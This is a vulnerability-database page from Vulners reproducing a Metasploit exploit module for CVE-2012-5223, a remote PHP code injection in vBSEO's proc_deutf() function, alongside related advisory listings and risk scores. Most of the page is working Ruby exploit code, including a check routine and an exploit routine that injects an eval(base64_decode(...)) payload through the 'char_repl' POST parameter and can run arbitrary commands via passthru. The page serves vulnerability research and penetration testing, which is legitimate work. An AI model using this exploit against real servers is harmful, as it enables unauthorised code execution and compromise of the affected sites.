Vulners
Lucene search
vBSEO proc_deutf() Remote PHP Code Injection
🗓️ 30 Jan 2012 22:15:27Reported by EgiX <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 23 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2012-5223 | 1 Oct 201220:55 | – | attackerkb |
 | CVE-2012-5223 | 27 Jan 201200:00 | – | circl |
 | vBSEO Remote PHP Code Injection (CVE-2012-5223) | 6 Jun 201300:00 | – | checkpoint_advisories |
 | CVE-2012-5223 | 1 Oct 201220:00 | – | cve |
 | CVE-2012-5223 | 1 Oct 201220:00 | – | cvelist |
 | vBSEO 3.6.0 RCE | 31 Jan 201200:00 | – | dsquare |
 | CVE-2012-5223 | 1 Oct 201220:55 | – | nvd |
 | vBSEO 'proc_deutf()' Remote Code Execution Vulnerability | 31 Jan 201200:00 | – | openvas |
| vBSEO 'proc_deutf()' RCE Vulnerability - Active Check | 31 Jan 201200:00 | – | openvas |
 | Code injection | 1 Oct 201220:55 | – | prion |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBSEO proc_deutf() Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the 'proc_deutf()' function
defined in /includes/functions_vbseocp_abstract.php for vBSEO versions
3.6.0 and earlier. User input passed through 'char_repl' POST parameter
isn't properly sanitized before being used in a call to preg_replace()
function which uses the 'e' modifier. This can be exploited to inject
and execute arbitrary code leveraging the PHP's complex curly syntax.
},
'Author' => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5223'],
['OSVDB', '78508'],
['BID', '51647'],
['EDB', '18424']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 8190,
'Keys' => ['php'],
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '2012-01-23',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
OptString.new('CMD', [false, "Command to execute"])
])
end
def check
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => "POST",
'uri' => uri,
'data' => data
})
if response.code == 200 and response.body =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
if datastore['CMD']
p = "passthru(\"%s\");" % datastore['CMD']
p = Rex::Text.encode_base64(p)
else
p = Rex::Text.encode_base64(payload.encoded)
end
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'data' => data,
'headers' => { 'Code' => p }
})
vprint_status("Server replied with #{response ? response.code : "nothing"}")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
EPSS0.79642